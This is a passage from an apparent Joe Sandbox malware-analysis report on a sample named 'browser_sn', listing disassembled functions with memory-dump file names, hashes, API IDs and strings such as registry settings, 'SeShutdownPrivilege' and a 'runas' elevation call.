                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                            • String ID:
                                                                            • API String ID: 3778485334-0
                                                                            • Opcode ID: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
                                                                            • Instruction ID: 8587ec692964547fb05665ca0194b2d3abc80e60a0e77b37a3afbe76658853c4
                                                                            • Opcode Fuzzy Hash: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
                                                                            • Instruction Fuzzy Hash: C631B035908B4285EB90AF54E8413AA73B0FB8879AF504136DFCE827A5DFBCE054C740
                                                                            Function 00007FF6C2B85910 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$FindFirstModuleName
                                                                            • String ID: *.dsm
                                                                            • API String ID: 1519589655-1970359449
                                                                            • Opcode ID: 5ec88052d5adebc3db2df3dc82cb1158468950cb75ad4b7486c7f1220c09e049
                                                                            • Instruction ID: b0ad8af053722765d9ac69283dabc0b502d8410907f8659c36eda5298b18a3ca
                                                                            • Opcode Fuzzy Hash: 5ec88052d5adebc3db2df3dc82cb1158468950cb75ad4b7486c7f1220c09e049
                                                                            • Instruction Fuzzy Hash: 7131502560868681EBA0CF24A9842AA73A0FB497B9F405732DEBD837D4DE7CD509C700
                                                                            Function 00007FF6C2BD77F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 53registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfile$FileModuleNameQueryValue
                                                                            • String ID: UseRegistry$admin$admin_auth
                                                                            • API String ID: 1028385882-3376419731
                                                                            • Opcode ID: d5f9d5c0af733a8a18aaad5fcf10d0583086e22d43d578638aeb5c775166167f
                                                                            • Instruction ID: dd6561f2945277ab20cbe128bc0b65bce145958d744fad82916315efea8ab53f
                                                                            • Opcode Fuzzy Hash: d5f9d5c0af733a8a18aaad5fcf10d0583086e22d43d578638aeb5c775166167f
                                                                            • Instruction Fuzzy Hash: A1213D31618A82D1EA90CF11E8846AA73B0FB89789F801135EE8E83B58CF7DE545CB40
                                                                            Function 00007FF6C2B934B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36shutdownCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueWindows
                                                                            • String ID: SeShutdownPrivilege
                                                                            • API String ID: 1314775590-3733053543
                                                                            • Opcode ID: 363ed4c67b5ca12eadee3f550d356d17c608b08a1ee121bb449b59d57746889a
                                                                            • Instruction ID: 4b6851d77b2f7cae8d8d71df0a08a9c796e13ac0a523745ba51886e76ac20d47
                                                                            • Opcode Fuzzy Hash: 363ed4c67b5ca12eadee3f550d356d17c608b08a1ee121bb449b59d57746889a
                                                                            • Instruction Fuzzy Hash: D9018471A18A4282EB90DF20F8452AA73B0FF89749F445435EE8E87754DFBDD058C740
                                                                            Function 00007FF6C2BD7750 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$FileModuleNamePrivateProfile
                                                                            • String ID: UseRegistry$admin
                                                                            • API String ID: 3032973919-2802730080
                                                                            • Opcode ID: f394e00a07ad10370d3a9fb3f4169cee617936cad869a8b398f64821c48fdab7
                                                                            • Instruction ID: 2ae526b2a015504bbd1639bdfa0568b9ff6f38d5fcfac439fc68e7f3837129f0
                                                                            • Opcode Fuzzy Hash: f394e00a07ad10370d3a9fb3f4169cee617936cad869a8b398f64821c48fdab7
                                                                            • Instruction Fuzzy Hash: 0001C835E1995281FEA1DF51E8647F52360FF99B5EF800572CE8EC2B64CEACE1449610
                                                                            Function 00007FF6C2B89BD0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                            • String ID: -securityeditor$p$runas
                                                                            • API String ID: 3648085421-1380712588
                                                                            • Opcode ID: 6428cee7919a180ae7089cf50127ee33227a6254b4296794cfa51c588de506a2
                                                                            • Instruction ID: bfe5b7a7c28ed6bfa83c9e393d3ae933d060e362f4628f5b10de3a7d36df3e31
                                                                            • Opcode Fuzzy Hash: 6428cee7919a180ae7089cf50127ee33227a6254b4296794cfa51c588de506a2
                                                                            • Instruction Fuzzy Hash: 2201C835619B8185E7A09F10F4943AAB3B4FB88749F900236DACD42B58DFBDD118CB40
                                                                            Function 00007FF6C2C48C90 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _get_daylight$CurrentProcess__tzset_errno_isindst
                                                                            • String ID:
                                                                            • API String ID: 1870958493-0
                                                                            • Opcode ID: d42586344bd6afb1d42c0f7a2c15e1262e76e9d2421f5cfeb9a02ae854df84cf
                                                                            • Instruction ID: 34517566d2e59035b74855c033ea08734b5223fc88dd05462f66d2f9c6840b6c
                                                                            • Opcode Fuzzy Hash: d42586344bd6afb1d42c0f7a2c15e1262e76e9d2421f5cfeb9a02ae854df84cf
                                                                            • Instruction Fuzzy Hash: 55712332F041024BF7688F249D916B966A6BBA434EF648235EF49C6BD9DF79A9018600
                                                                            Function 00007FF6C2C447E4 Relevance: 9.1, APIs: 6, Instructions: 80COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                            • String ID:
                                                                            • API String ID: 1239891234-0
                                                                            • Opcode ID: cab22b7f63e68bd4fe1f659d6095baf5ecdb6c5b170d8f81b70fd2e30acf9a7e
                                                                            • Instruction ID: b74ad5f25e434f7862166f11bd457772bfba5be136ff8b24480f813c0bc29ff0
                                                                            • Opcode Fuzzy Hash: cab22b7f63e68bd4fe1f659d6095baf5ecdb6c5b170d8f81b70fd2e30acf9a7e
                                                                            • Instruction Fuzzy Hash: 61311C32618B8286DBA0DF25E8406AA73B4FB88759F500135EF9D83B99DFBCD545CB40
                                                                            Function 00007FF6C2BB13A0 Relevance: 9.0, APIs: 6, Instructions: 42clipboardmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ClipboardGlobal$AllocDataEmptyLockOpenUnlock
                                                                            • String ID:
                                                                            • API String ID: 2715784024-0
                                                                            • Opcode ID: e11c53b316a9bfdc0ba5bcfd4052570f78fa6fe53520f5204ff61f5d8110080f
                                                                            • Instruction ID: 3d31a74f778adaebb0586edd6351550780541e5e539beaa7159cf2ed72bfdbfc
                                                                            • Opcode Fuzzy Hash: e11c53b316a9bfdc0ba5bcfd4052570f78fa6fe53520f5204ff61f5d8110080f
                                                                            • Instruction Fuzzy Hash: 37019210B28A4282FA84CF25685827572A1EF46BEEF0C1134DEAE877C0DF6CE044C650
                                                                            Function 00007FF6C2BD7BD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00007FF6C2B8D390: GetModuleFileNameA.KERNEL32 ref: 00007FF6C2B8D3BB
                                                                            • GetPrivateProfileIntA.KERNEL32 ref: 00007FF6C2BD7C09
                                                                              • Part of subcall function 00007FF6C2BD7650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6C2BD7689
                                                                              • Part of subcall function 00007FF6C2BD7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6C2BD76DD
                                                                              • Part of subcall function 00007FF6C2BD7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6C2BD7722
                                                                              • Part of subcall function 00007FF6C2BD78E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6C2BD792E
                                                                              • Part of subcall function 00007FF6C2BD78E0: RegQueryValueExA.ADVAPI32 ref: 00007FF6C2BD796A
                                                                              • Part of subcall function 00007FF6C2BD78E0: RegQueryValueExA.ADVAPI32 ref: 00007FF6C2BD79B2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfile$CreateQueryValue$FileModuleName
                                                                            • String ID: UseRegistry$admin$group1
                                                                            • API String ID: 1728753321-252764636
                                                                            • Opcode ID: dc4ee2f34963cf6fb66591f643b46c4958349bc6d42a33ae21c770aef2cc3bec
                                                                            • Instruction ID: e6fab9345e1b714464144886b1965797dc737465c0023fb93c7a6035ac499f95
                                                                            • Opcode Fuzzy Hash: dc4ee2f34963cf6fb66591f643b46c4958349bc6d42a33ae21c770aef2cc3bec
                                                                            • Instruction Fuzzy Hash: 64110035A1858291EAA0AF21E4913F92361FF9934EFD40431DE8DC6766DEBDE114D700
                                                                            Function 00007FF6C2BD7C90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00007FF6C2B8D390: GetModuleFileNameA.KERNEL32 ref: 00007FF6C2B8D3BB
                                                                            • GetPrivateProfileIntA.KERNEL32 ref: 00007FF6C2BD7CC9
                                                                              • Part of subcall function 00007FF6C2BD7650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6C2BD7689
                                                                              • Part of subcall function 00007FF6C2BD7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6C2BD76DD
                                                                              • Part of subcall function 00007FF6C2BD7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6C2BD7722
                                                                              • Part of subcall function 00007FF6C2BD78E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6C2BD792E
                                                                              • Part of subcall function 00007FF6C2BD78E0: RegQueryValueExA.ADVAPI32 ref: 00007FF6C2BD796A
                                                                              • Part of subcall function 00007FF6C2BD78E0: RegQueryValueExA.ADVAPI32 ref: 00007FF6C2BD79B2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfile$CreateQueryValue$FileModuleName
                                                                            • String ID: UseRegistry$admin$group2
                                                                            • API String ID: 1728753321-2518265958
                                                                            • Opcode ID: 42ecbddd9c1df14715f3163af6785be1f325581b827072a0f24e6963c90d4554
                                                                            • Instruction ID: 6702ff3131b5e044c6cdd5ba2986091f35d80d15c8d626b5bb0fbc2d916adff6
                                                                            • Opcode Fuzzy Hash: 42ecbddd9c1df14715f3163af6785be1f325581b827072a0f24e6963c90d4554
                                                                            • Instruction Fuzzy Hash: F1110C35A1858291EAA0AF21E4A13F96360FF9934DFC40432DECDC67AADEBDE115D700
                                                                            Function 00007FF6C2BD7F50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00007FF6C2B8D390: GetModuleFileNameA.KERNEL32 ref: 00007FF6C2B8D3BB
                                                                            • GetPrivateProfileIntA.KERNEL32 ref: 00007FF6C2BD7F8D
                                                                              • Part of subcall function 00007FF6C2BD7650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6C2BD7689
                                                                              • Part of subcall function 00007FF6C2BD7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6C2BD76DD
                                                                              • Part of subcall function 00007FF6C2BD7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6C2BD7722
                                                                              • Part of subcall function 00007FF6C2BD77F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6C2BD7840
                                                                              • Part of subcall function 00007FF6C2BD77F0: RegQueryValueExA.ADVAPI32 ref: 00007FF6C2BD787D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
